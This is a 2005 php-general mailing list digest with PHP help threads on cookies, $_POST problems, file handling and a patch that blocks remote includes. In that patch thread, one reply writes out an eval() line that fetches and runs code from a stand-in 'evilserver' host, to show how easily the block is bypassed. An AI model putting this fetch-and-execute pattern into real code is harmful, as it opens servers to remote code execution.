|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
php-general Digest 2 Mar 2005 21:26:32 -0000 Issue 3315
php-general-digest-help
lists.php.net
Date: Wed Mar 02 2005 - 15:26:32 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
php-general Digest 2 Mar 2005 21:26:32 -0000 Issue 3315
Topics (messages 209783 through 209854):
Re: _POST not working (using mini_httpd) - 2 attachments
209783 by: overbored
Re: Setting cookie on first visit
209784 by: yangshiqi
209810 by: Dan Tappin
209840 by: Richard Lynch
sql query
209785 by: William Stokes
209787 by: M. Sokolewicz
209809 by: Jason Petersen
209822 by: William Stokes
Delete last 15 chars from a file
209786 by: Shaun
209788 by: M. Sokolewicz
Re: How can I secure database passwords used by PHP
209789 by: Jason Barnett
Re: Authentication fails
209790 by: John Swartzentruber
209792 by: Jason Barnett
209803 by: John Swartzentruber
209836 by: Richard Lynch
209837 by: Richard Lynch
209844 by: John Swartzentruber
Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
209791 by: Jason Barnett
209797 by: Markus Mayer
209802 by: Jason Wong
209805 by: Bostjan Skufca . domenca.com
209806 by: Tom Z Meinlschmidt
209830 by: Richard Lynch
209831 by: Richard Lynch
209839 by: Jason Wong
Re: PHP slowness
209793 by: Markus Mayer
Re: Spam and this list
209794 by: AdamT
Re: [NEWBIE] How to allow for <a href> tags but no others? [SOLVED]
209795 by: Dave
PHP5 DOM - DomDocumentFragments empty
209796 by: Tobias Tom
209848 by: Jason Barnett
Re: combining values
209798 by: Ford, Mike
209808 by: M. Sokolewicz
Mistaken Identity - Was: Anti-password trading/sharing solutions
209799 by: Dan Tappin
Re: How can I secure database passwords used by PHP webpages
209800 by: Dan Tappin
209813 by: Chris W. Parker
209843 by: Richard Lynch
mailserver logfile analyser
209801 by: woldhekkie
209834 by: Richard Lynch
php-general-unsubscribelists.php.net
209804 by: Raúl Castro Marín
Connecting to a AS/400?
209807 by: Frank Arensmeier
209829 by: Richard Lynch
209835 by: Frank Arensmeier
209841 by: Stephen Johnson
[suspicious - maybe spam] Re: [PHP] Connecting to a AS/400?
209811 by: Dan Tappin
update of mysql to 4.1
209812 by: Peter
update of mysql to 4.x
209814 by: Peter
209815 by: John Nichel
209842 by: Peter
209845 by: Marek Kilimajer
209850 by: John Nichel
Re: Open source portal systems???
209816 by: Judson Vaughn
Bypassing php.ini setting for file uploads?
209817 by: Matt Cassarino
209826 by: Ian Firla
209827 by: Richard Lynch
Download with header() - file corrupted
209818 by: Werner Jäger
209824 by: Richard Lynch
FREETYPE and GD
209819 by: Aaron Todd
209823 by: Richard Lynch
209853 by: Aaron Todd
Re: PHP 5.1 CVS Interface Question
209820 by: Gavin Roy
Re: php DBMS
209821 by: Gerben
209825 by: Chris W. Parker
209828 by: Chris W. Parker
Document root, preferred way to find it???
209832 by: Al
209846 by: Chris W. Parker
PHP Sessions?
209833 by: rory walsh
209851 by: Chris W. Parker
209854 by: rory walsh
Re: Logging with PHP to SMTP server
209838 by: Richard Lynch
Re: Supporting "Cancel"
209847 by: Richard Lynch
loggin into linux account
209849 by: Vaibhav Sibal
Re: Catalog or cart
209852 by: Robby Russell
Administrivia:
To subscribe to the digest, e-mail:
php-general-digest-subscribelists.php.net
To unsubscribe from the digest, e-mail:
php-general-digest-unsubscribelists.php.net
To post to the list, e-mail:
php-generallists.php.net
----------------------------------------------------------------------
attached mail follows:
ceol-i-e.com (Richard Lynch) wrote in
news:2413.66.99.91.45.1109711656.squirrelwww.l-i-e.com:
> overbored wrote:
>> Hi all, I'm learning PHP and I'd need to create a simple Web-based
>> ifconfig
>> tool for a Soekris box (running Pebble). However, I've been
>> unsuccessful at
>> getting PHP working with mini_httpd. In particular, the POST data is
>> not being received. Here's what I did...
>>
>> First, I applied (only) the SCRIPT_FILENAME and index.php
>> modifications to mini_httpd.c, as suggested in:
>>
>> http://m0n0.ch/wall/list/?action=show_msg&actionargs[]=15&actionargs[]
>> =11
>>
>> Then I built & installed this on a (regular) Debian box, which had
>> php4 installed from apt. (This doesn't seem related, but for some
>> reason, when I
>> start up, I get a warning: "socket: Address family not supported by
>> protocol".)
>
> This is probably about IP6 -- at least if it's durring boot-up.
> What are the lines immediately before/after that?
> If they say anything about IP6, you're almost for sure okay.
> That just means some software isn't ready for IP6 and some is -- Which
> is pretty much the current state of the industry.
There are no lines before/after that; it's the only output I see.
>> Next, I created some simple PHP files, and I found that POST data
>> isn't getting through at all. Googling didn't really turn up much,
>> and I know this is possible because the m0n0wall project does just
>> this (download their rootfs and look at the PHP files under
>> /usr/local/www). Basically, _POST/_GET/_REQUEST never exist, and it
>> seems the only way I can
>> get the data is with GET and parsing the HTTP_ENV_VARS.
>
> If it's older PHP, try $HTTP_POST_VARS and $HTTP_GET_VARS and so on.
I have PHP 4.3.10-2. If you see test.php, I did have a test for
$HTTP_POST_VARS in there. I just added a similar test for $HTTP_GET_VARS,
and it also prints nothing.
> Other than that, I'd have to say double-check the settings of
> mini_httpd -- and try a mini_httpd mailing list.
>
> PHP doesn't really *do* a whole lot with the GET/POST data from the
> server.
>
> It's kinda just "there" or "not there" for PHP to work with...
>
> Not saying PHP isn't maybe looking in the "wrong" place for where
> mini_httpd wants to send it, but I think that's all spelled out in the
> CGI standard.
>
> Yes, the PHP Module and all other Modules conform to the CGI standard
> -- that's how they work.
>
> It's just that CGI got appropriated over time to mean something other
> whan what it actually meant originally, and, well, there it is.
>
> PS Don't send attachments. Put 'em on-line and send URLs.
Sorry. I was actually told to do the opposite once, when I provided URLs.
attached mail follows:
When the user first visits your site, there is no skin in your cookie. Then
you can give a default value. And after the user modifies his/her profile,
you can set it to the cookie. So I don't think it is a problem of setting
cookie.
Best regards,
Yang Shiqi
-----Original Message-----
From: Tom Whitbread [mailto:tomretinalnerve.com]
Sent: Wednesday, March 02, 2005 5:18 PM
To: php-general lists
Subject: [PHP] Setting cookie on first visit
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
attached mail follows:
The manual detail this issue:
http://ca.php.net/setcookie
You can't see the cookie until you hit the next page. There is no way
view the newly set cookie.
Dan Tappin
On Mar 2, 2005, at 2:18 AM, Tom Whitbread wrote:
> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if its being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie untill a user refreshes the page once. How
> can I ensure it's set when it hasnt been set before?
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
attached mail follows:
Tom Whitbread wrote:
> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if its being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie untill a user refreshes the page once. How
> can I ensure it's set when it hasnt been set before?
Sure it's being set.
That's how you see it when they refresh the page.
$_COOKIE tells you want Cookies the browser *sent* with the request for
the URL.
It's up to you to track within that script what Cookies you are sending
*back* with the answer.
That sounds kinda harsh, and I can see why you'd want it to work the other
way -- as I first did.
But you *need* COOKIES to be what the browser sent initially.
I guess you *could* start doing things like:
<?php
setcookie('var', $value);
$_COOKIES['var'] = $value;
?>
and then it would do what you want...
But you could quickly confuse yourself about what came *in* from the
browser and what you are sending *out* to the browser.
Probably better for you to take a step back and think about how cookies
work, and who sends what where.
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
Hello
Can someone explain this to me. I don't know how to read this.
if (!$variable = mysql_query("select id,sessid from users where ...
What is this "if(!"
I mean the ! sign.
Thanks
-Will
attached mail follows:
! is a logical NOT operator. It simply turns true => false, and false =>
true.
So, what you have is:
$a = true;
if($a) {
echo 'true';
} else {
echo 'false';
}
if(!$a) {
echo 'false!';
} else {
echo 'true!';
}
In these 2 cases, it will echo
true and true!
More info can be found here:
http://www.php.net/manual/en/language.operators.logical.php
William Stokes wrote:
> Hello
>
> Can someone explain this to me. I don't know how to read this.
>
> if (!$variable = mysql_query("select id,sessid from users where ...
>
> What is this "if(!"
>
> I mean the ! sign.
>
> Thanks
>
> -Will
attached mail follows:
On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes <kallesoperamail.com> wrote:
> Hello
>
> Can someone explain this to me. I don't know how to read this.
>
> if (!$variable = mysql_query("select id,sessid from users where ...
>
> What is this "if(!"
This is a way to run a SQL query, capture the return value, and
perform an action if the query failed. For code readability, I would
probably write that as two statements:
$variable = mysql_query("SELECT * FROM blah");
if(!$variable) { error_handler(mysql_error()); }
See the documentation for information on mysql_query return values:
http://us2.php.net/manual/en/function.mysql-query.php
Jason
attached mail follows:
OK got that. Thanks...
"Jason Petersen" <fuzzybadgmail.com> kirjoitti
viestissä:5eafe1ec0503020806886216fmail.gmail.com...
> On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes <kallesoperamail.com>
> wrote:
>> Hello
>>
>> Can someone explain this to me. I don't know how to read this.
>>
>> if (!$variable = mysql_query("select id,sessid from users where ...
>>
>> What is this "if(!"
>
> This is a way to run a SQL query, capture the return value, and
> perform an action if the query failed. For code readability, I would
> probably write that as two statements:
>
> $variable = mysql_query("SELECT * FROM blah");
> if(!$variable) { error_handler(mysql_error()); }
>
> See the documentation for information on mysql_query return values:
> http://us2.php.net/manual/en/function.mysql-query.php
>
> Jason
attached mail follows:
Hi,
I am trying to create an XML file, it will be done in stages so if the file
isn't present I will add the line:
<?xml version="1.0" ?>
<root_element>
Then for each line I add I add the following
<child_element>data<child_element>
But for various reasons the application won't know when the file is complete
so it won't have the final:
</root_element>
To solve this I intend to add the following each time
<child_element>data<child_element>
</root_element>
and delete the </root_element> every time I add a new
<child_element>data<child_element>. Can anyone tell me how I can delete the
last 15 characters from a file every time I open the file?
Thanks for your help
attached mail follows:
Shaun wrote:
> Hi,
>
> I am trying to create an XML file, it will be done in stages so if the file
> isn't present I will add the line:
>
> <?xml version="1.0" ?>
> <root_element>
>
> Then for each line I add I add the following
>
> <child_element>data<child_element>
>
> But for various reasons the application won't know when the file is complete
> so it won't have the final:
>
> </root_element>
>
> To solve this I intend to add the following each time
>
> <child_element>data<child_element>
> </root_element>
>
> and delete the </root_element> every time I add a new
> <child_element>data<child_element>. Can anyone tell me how I can delete the
> last 15 characters from a file every time I open the file?
>
> Thanks for your help
first of all, why don't you simply do something like:
<?php
$contents = file_get_contents('file');
$contents = str_replace('</root_element>', '', $contents);
$contents .= "<child_element>data<child_element></root_element>";
file_put_contents('file', $contents);
?>
But well, to strip off the last 15 chars, simply use substr(), thus:
$contents = substr(file_get_contents('file'), 0, -15);
that will return the entire file contents - the last 15 chars.
attached mail follows:
>>
>>Who are these "other webpage maintainers" and why do they have access
>>to your PHP source code? This isn't a PHP issue. The MySQL password
>>has to be in a file as plain text; there's no getting around that (as
>>recently discussed on here). Your issue is controlling access to the
>>machine and the files, so is an OS/policy/trust issue, imo.
>
John is right. And from what you say in your response I think that
sharing database passwords isn't really the problem. It seems that
John's answer was right on - you have an OS/policy/trust issue.
If you are trying to limit access to what files the PHP user can read,
you might find this message from the archives quite useful...
http://marc.theaimsgroup.com/?l=php-general&m=109066460609993&w=2
--
Teach a man to fish...
NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins
attached mail follows:
On 3/1/2005 3:52 PM John Swartzentruber wrote:
> On 3/1/2005 2:12 PM Jason Barnett wrote:
>
>> John Swartzentruber wrote:
>>
>>> Somehow my PHP 5.0.3 or something is configured incorrectly. When I try
>>> to get past an authentication input, nothing happens. For example, I
>>> have phpMyAdmin configured now to use mysqli, but when I enter the
>>> username and password, the screen doesn't change. In previous testing, I
>>> saw that an incorrect authentication was detected and reported, but a
>>> correct authentication had no affect.
>>
>>
>>
>> Not sure if this is a phpMyAdmin bug or not, but you might try to clear
>> out all cookies that your browser has from john.swartzentruber.us. For
>> that matter you should see if you *have* any cookie set from
>> john.swartzenruber.us. I'm not pointing fingers at phpMyAdmin, but just
>> tossing out a possible solution.
>>
>>
>>> My phpinfo() output is at http://john.swartzentruber.us/test.php
>>>
>>> For example, I'm trying to use a simple file upload script called "file
>>> thingie" that is at http://www.solitude.dk/filethingie/download.php
>>>
>>> I have edited the original file only to decrease the maximum file size
>>> to 500 bytes and limit uploads to text files. I hope no one here tries
>>> to be nasty. The user name is "USERNAME2" and the password is
>>> "PASSWORD".
>>
>>
>>
>> Yeah... I wouldn't suggest putting user / pw combos onto the web even if
>> you intend on changing it later. You just never know.
>
>
> Well, if someone can get past the login page, at least someone is making
> progress :-)
>
>
>>> Can anyone check this out and give me some clues or things to look into?
>>> Is there some setting that would cause _POST data to disappear? How
>>> would I go about debugging this?
>>
>>
>>
>> Start by going to the form page's action page (since your test.php page
>> only displays phpinfo() I'm not sure what this is going to be). We'll
>> call this page action.php.
>
>
> I forgot to mention that the page in question was
> http://john.swartzentruber.us/test.php I'm working on creating an even
> simpler script, but since I'm not that familiar with either HTML forms
> or PHP, it is taking some time. In these examples, the action page is
> the same page as original page (i.e., "filethingie.php"). When I look at
> the page source (i.e., the PHP output) in my browser, this is what the
> form looks like (sorry about the word wrapping):
>
> <form action="filethingie.php" method="post">
> <h1>Please Login</h1> <input type="hidden" name="log_lang"
> value="en" /> <div>
> <label for="log_user">User: </label><input type="text"
> size="15" name="log_user" id="log_user" />
> </div>
> <div>
> <label for="log_pass">Pass: </label><input type="password"
> size="15" name="log_pass" id="log_pass" />
>
> <input type="hidden" name="action" value="login" />
> <input type="submit" value="login" />
> </div>
> </form>
>
>
>
>> The simplest way to debug this (but it's effective) is to
>> var_dump($_POST) at the top of action.php. Insert this at the very top
>> of the page (likely to cause a lot of errors :) and then gradually cut /
>> paste that code throughout the action page. Do this until you narrow
>> down the problem code.
>
>
> Well, I've been trying print_r($_POST), and it is always empty. That's
> the problem.
>
>
>> Since this is a file upload script you are doing you will probably want
>> to var_dump($_FILES) as well. Heck, if you're having *session* problems
>> then you should be looking into the $_SESSION array and (possibly) the
>> $_COOKIE array.
>
>
> I'll try removing the session stuff to see if that is significant. It
> looks like $_SESSION is also empty, although I do see what appear to be
> session files created in /tmp, which is where they go.
>
> To summarize, it appears that the problem is not with authentication per
> se, but is that $_POST is empty when the script is called from a form in
> the same file.
>
> I'll try to test this using a different action script and see what
> happens. In the meantime, if you see anything or have any other ideas,
> please let me know. I appreciate you taking the time to help.
I've got some more information and I hope someone can help me figure out
the problem. I changed my original PHP program so that the form action
script is a different script. In that file, I just do a var_dump on
$_POST and $_SERVER.
When I do that, it looks like all of the data comes through correctly.
On the other hand, when the form action script is the *same* script that
contains the form, when I do the same var_dumps, the data does *not*
have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
"POST" in this instance.
So it appears that my problem is that when I post to the same script I
am running, things don't work. I still have no idea why this would be
the case. Does anyone have any ideas?
attached mail follows:
>
> I've got some more information and I hope someone can help me figure out
> the problem. I changed my original PHP program so that the form action
> script is a different script. In that file, I just do a var_dump on
> $_POST and $_SERVER.
>
> When I do that, it looks like all of the data comes through correctly.
Super.
>
> On the other hand, when the form action script is the *same* script that
> contains the form, when I do the same var_dumps, the data does *not*
> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
> "POST" in this instance.
My suspicion was that this was what had happened as well, but *why* your
POST is being interpreted as a GET is unclear to me. I did notice that
you were sending GET variables when you had a login error... but someone
more knowledgeable than I (Richard?) will likely come along and explain
how / why PHP can interpret a form with both POST and GET variables as a
GET script.
>
> So it appears that my problem is that when I post to the same script I
> am running, things don't work. I still have no idea why this would be
> the case. Does anyone have any ideas?
One other thing I noticed, but didn't quite understand. Your
apache2handler shows you are using port 0, but your SERVER_PORT is 80.
I don't understand the Apache side of things well enough to untangle
that one either.
--
Teach a man to fish...
NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins
attached mail follows:
On 3/2/2005 9:22 AM Jason Barnett wrote:
>>On the other hand, when the form action script is the *same* script that
>>contains the form, when I do the same var_dumps, the data does *not*
>>have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>>"POST" in this instance.
>
>
> My suspicion was that this was what had happened as well, but *why* your
> POST is being interpreted as a GET is unclear to me. I did notice that
> you were sending GET variables when you had a login error... but someone
> more knowledgeable than I (Richard?) will likely come along and explain
> how / why PHP can interpret a form with both POST and GET variables as a
> GET script.
I don't know, but in this particular case, it shouldn't be significant
because I see the problem when there is no error, so the GET variables
aren't needed.
>>So it appears that my problem is that when I post to the same script I
>>am running, things don't work. I still have no idea why this would be
>>the case. Does anyone have any ideas?
>
>
> One other thing I noticed, but didn't quite understand. Your
> apache2handler shows you are using port 0, but your SERVER_PORT is 80.
> I don't understand the Apache side of things well enough to untangle
> that one either.
That is odd. I use name-based virtual hosting, and I have both an
internal and an external address for each VirtualHost, but in all cases,
I specify the port to be 80. I don't know why apache2handler would show
0. I guess it is one more thing to google to look for clues.
attached mail follows:
>> On the other hand, when the form action script is the *same* script that
>> contains the form, when I do the same var_dumps, the data does *not*
>> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>> "POST" in this instance.
>
> My suspicion was that this was what had happened as well, but *why* your
> POST is being interpreted as a GET is unclear to me. I did notice that
> you were sending GET variables when you had a login error... but someone
> more knowledgeable than I (Richard?) will likely come along and explain
> how / why PHP can interpret a form with both POST and GET variables as a
> GET script.
As I recall, the POST format simply allows GET data as well.
Almost for sure POST came after GET, in terms of historical web techniques.
So when they made the spec for POST, GET data was included already.
I don't think PHP does any "magic" to make it work, really...
If his form says: method="post" and it's not sending POST and the
REQUEST_METHOD isn't POST, then the httpd server (mini_httpd, right) is
almost for sure at fault.
I'm repeating myself, but PHP pretty much just takes whatever the SERVER
sends it, and fills in $_SERVER and $_POST and $_GET based on that.
Fix mini_httpd and/or its configuration if you want to get $_POST to work.
You'll need to ask mini_httpd experts how to do that... Which ain't here.
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
> I've got some more information and I hope someone can help me figure out
> the problem. I changed my original PHP program so that the form action
> script is a different script. In that file, I just do a var_dump on
> $_POST and $_SERVER.
>
> When I do that, it looks like all of the data comes through correctly.
>
> On the other hand, when the form action script is the *same* script that
> contains the form, when I do the same var_dumps, the data does *not*
> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
> "POST" in this instance.
>
> So it appears that my problem is that when I post to the same script I
> am running, things don't work. I still have no idea why this would be
> the case. Does anyone have any ideas?
Whoops!
You're *not* the mini_httpd guy, are you?
Sorry, crossed my threads.
Start digging into httpd.conf and look real careful at any changes
involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one
that ships out with the software. (See "man diff")
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
On 3/2/2005 2:29 PM Richard Lynch wrote:
>>I've got some more information and I hope someone can help me figure out
>>the problem. I changed my original PHP program so that the form action
>>script is a different script. In that file, I just do a var_dump on
>>$_POST and $_SERVER.
>>
>>When I do that, it looks like all of the data comes through correctly.
>>
>>On the other hand, when the form action script is the *same* script that
>>contains the form, when I do the same var_dumps, the data does *not*
>>have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>>"POST" in this instance.
>>
>>So it appears that my problem is that when I post to the same script I
>>am running, things don't work. I still have no idea why this would be
>>the case. Does anyone have any ideas?
>
>
> Whoops!
>
> You're *not* the mini_httpd guy, are you?
> Sorry, crossed my threads.
No, "I'm the Apache/2.0.52 (Fedora) Server at john.swartzentruber.us
Port 80" guy.
> Start digging into httpd.conf and look real careful at any changes
> involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one
> that ships out with the software. (See "man diff")
I've done this and don't see anything. I'm not positive I have the
original httpd.conf file to compare against, but I have one saved in a
backup directory that is named httpd.conf.rpmnew, so I think it is
either original or from an RPM update.
My differences are:
1. additional files in DirectoryIndex
2. HostnameLookups is On
3. the /server-status and /server-info sections are uncommented (but
only accessible from my internal network)
4. Added virtual hosting stuff
I looked at all instances of GET and POST, and only see a section that
is commented out in both copies of httpd.conf.
Here is my VirtualHost for the thing I am testing (I X'd out some stuff):
<VirtualHost 66.92.XXXX.XX:80 10.X.0.3:80>
ServerName john.swartzentruber.us
ServerAdmin webmasXXXXXXXtzentruber.us
DocumentRoot "/var/www/vhosts/swartzentruber.us/john/html"
<Directory "/var/www/vhosts/swartzentruber.us/john/html">
AllowOverride AuthConfig
Options Indexes Includes FollowSymLinks
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
Is there anything funny there that would cause a problem?
attached mail follows:
Tom Z. Meinlschmidt wrote:
> Hi,
>
> I've experienced a lot of attacks in my hosting server due to silly users and
> their scripts with holes. So I prepared this little patch to 4.3.10, which
> disables using url wrappers in include/include_once/require/require_once
> statemens (switchable in php.ini). See readme.security from patch
>
> patch is there:
>
> http://orin.meinlschmidt.org/~znouza/php_patch.txt
>
> comments are welcome
>
> /tom
>
http://php.net/manual/en/ini.php#ini.list
allow_url_fopen = 0
--
Teach a man to fish...
NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins
attached mail follows:
Correct me if I'm wrong, but isn't this already available in the standard PHP?
In the php.ini file, you can refuse the inclusion of url's :
allow_url_fopen = Off
I think also Hardened PHP offers additional similar protections.
Markus
On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote:
> Hi,
>
> I've experienced a lot of attacks in my hosting server due to silly users
> and their scripts with holes. So I prepared this little patch to 4.3.10,
> which disables using url wrappers in
> include/include_once/require/require_once statemens (switchable in
> php.ini). See readme.security from patch
>
> patch is there:
>
> http://orin.meinlschmidt.org/~znouza/php_patch.txt
>
> comments are welcome
>
> /tom
>
> --
> ===========================================================================
>==== Tomas Meinlschmidt, SBN3, MCT, MCP, MCP+I, MCSE, NetApp Filer &
> NetCache gPG fp: CB78 76D9 210F 256A ADF4 0B02 BECA D462 66AB 6F56 / $ID:
> 66AB6F56 GCS d-(?) s: a- C++ ULHISC*++++$ P+++>++++ L+++$>++++ E--- W+++$
> N++(+) !o !K w(---) !O !M V PS+ PE Y+ PGP++ t+ !5 X? R tv b+ !DI D+ G
> e>+++ h---- r+++ z+++
> ===========================================================================
>====
attached mail follows:
On Wednesday 02 March 2005 22:03, Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:
> > which disables using url wrappers in
> > include/include_once/require/require_once statemens (switchable in
>
> http://php.net/manual/en/ini.php#ini.list
>
> allow_url_fopen = 0
I haven't had a look at the patch in question but from my understanding of
the description above, after the application of the patch the filesystem
functions (ie fopen and friends) should still be able to use URLs.
Effectively it allows finer control over opening URLs.
I would like to think that the OP wouldn't go to the trouble of creating a
patch (for the latest release of PHP no less) for functionality that
already exists! IIRC a request for something similar was made on the list
some time ago.
--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts
attached mail follows:
From system security's standpoint:
<?php
$content = file_get_contents('http://www.domain.net/file.inc');
echo $content;
?>
is OK, but
<?php
include('http://www.domain.net/file.inc');
?>
is NOT!
Nice patch, Tom, will probably use it myself too...
regards,
Bostjan
On Wednesday 02 March 2005 11:54, Markus Mayer wrote:
> Correct me if I'm wrong, but isn't this already available in the standard
> PHP? In the php.ini file, you can refuse the inclusion of url's :
> allow_url_fopen = Off
>
> I think also Hardened PHP offers additional similar protections.
>
> Markus
>
> On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote:
> > Hi,
> >
> > I've experienced a lot of attacks in my hosting server due to silly users
> > and their scripts with holes. So I prepared this little patch to 4.3.10,
> > which disables using url wrappers in
> > include/include_once/require/require_once statemens (switchable in
> > php.ini). See readme.security from patch
> >
> > patch is there:
> >
> > http://orin.meinlschmidt.org/~znouza/php_patch.txt
> >
> > comments are welcome
> >
> > /tom
> >
> > --
> > =========================================================================
> >== ==== Tomas Meinlschmidt, SBN3, MCT, MCP, MCP+I, MCSE, NetApp Filer &
> > NetCache gPG fp: CB78 76D9 210F 256A ADF4 0B02 BECA D462 66AB 6F56 / $ID:
> > 66AB6F56 GCS d-(?) s: a- C++ ULHISC*++++$ P+++>++++ L+++$>++++ E--- W+++$
> > N++(+) !o !K w(---) !O !M V PS+ PE Y+ PGP++ t+ !5 X? R tv b+ !DI D+ G
> > e>+++ h---- r+++ z+++
> > =========================================================================
> >== ====
--
Best regards,
Bostjan Skufca
system administrator
Domenca d.o.o.
Phone: +386 4 5835444
Fax: +386 4 5831999
http://www.domenca.com
attached mail follows:
Tell me - how do you want to turn off remote includes and remain remote
file working?
allow_url_fopen turns off _both_. There's no choice what to disable
tom
Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:
>
>>Hi,
>>
>>I've experienced a lot of attacks in my hosting server due to silly users and
>>their scripts with holes. So I prepared this little patch to 4.3.10, which
>>disables using url wrappers in include/include_once/require/require_once
>>statemens (switchable in php.ini). See readme.security from patch
>>
>>patch is there:
>>
>>http://orin.meinlschmidt.org/~znouza/php_patch.txt
>>
>>comments are welcome
>>
>>/tom
>>
>
>
> http://php.net/manual/en/ini.php#ini.list
>
> allow_url_fopen = 0
>
attached mail follows:
Tom Z Meinlschmidt wrote:
> Tell me - how do you want to turn off remote includes and remain remote
> file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.
Sorry.
> allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
<?php
eval(implode('',file("http://evilserver.example.com")));
?>
So, like, what's the point to turning off only remote include and keeping
remote file?
Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.
For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.
If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.
If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.
Anything else is simply self-delusions of "security" imho. [shrug]
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
Bostjan Skufca domenca.com wrote:
> From system security's standpoint:
>
> <?php
> $content = file_get_contents('http://www.domain.net/file.inc');
> echo $content;
> ?>
>
> is OK, but
>
> <?php
> include('http://www.domain.net/file.inc');
> ?>
>
> is NOT!
>
> Nice patch, Tom, will probably use it myself too...
I'll be interested to see if it works in practice...
[see previous post of mine]
Ya never know.
I still haven't figured out why spam harvesters don't find even the
simplest obfuscations like %40 and @
But I guess if you come up with a billion fish every time you cast your
line, you don't worry about buying better bait.
I *suspect* this situation is different, in that you will have people
actively trying to alter their attacks to bypass this blockage, and it's
pretty simple to bypass.
But, perhaps, it will turn out to be that there are so many unpatched
wide-open places they can find that they'll never bother you again.
I sure hope so, for your sake!
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.
Funnily enough I think you'll find that he did (change the source) :)
> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
> eval(implode('',file("http://evilserver.example.com")));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?
I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:
include($somewhere);
Of course one should always validate $somwhere before using it but ...
--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts
attached mail follows:
I'm a little bit late in on this one, and asking questions after the problem
is solved is a bit academic, but I am curious about one thing - Does the
debian package do reverse lookups to try to get a name for the visiting IP
address? Every page request taking 5 seconds sounds like a name lookup
failure to me.
regards
Markus
On Tuesday 01 March 2005 13:45, Gerard wrote:
> > It looks like you are using Debian and probably did an apt-get install
> > php. Why don't you try compiling php by hand without all the extra
> > crap that I'm sure you don't need then try it. I think you will be
> > much happier. Debian is great software, but when it comes to things
> > like web services and php it is much better to compile by hand to get
> > the best performance.
>
> Thanks for that one! After a manual compile it all works fine :D
>
> - Gerard
attached mail follows:
On Tue, 01 Mar 2005 11:11:47 -0500, bob <phpgenantonakis.co.uk> wrote:
> Well, this time it took just 11 days to get my first bit of spam from
> this mailing list.
>
Do you mean the spam was from php-generallists.php.net ?
Or do you mean that you know for sure that your address was harvested
from this list?
I've not noticed getting any extra spam since joining, personally.
Don't forget that:
a) Emails you send to this list may be forwarded elsewhere, with your
address included
b) The email address you use for this list may have been 'brute-forced'
c) Some malicious oik may have posted your address somewhere else world-readable
